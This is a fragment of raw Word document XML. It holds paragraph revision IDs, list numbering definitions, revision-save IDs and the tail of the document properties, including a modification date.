          <w:p w14:paraId="63325EA5" w14:textId="77777777" w:rsidR="00A50AA4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1E65C89E" w14:textId="77777777" w:rsidR="00A50AA4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1C89F942" w14:textId="77777777" w:rsidR="00472469" w:rsidRDefault="00472469"/>
    <w:sectPr w:rsidR="00472469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642711">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="999456120">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="581451513">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1638487471">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="250356516">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="24798667">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1282028200">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1921676399">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="14351758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469"/>
    <w:rsid w:val="009C33B5"/>
    <w:rsid w:val="00A50AA4"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C922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26FFE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1482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2026-10-03T00:46:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>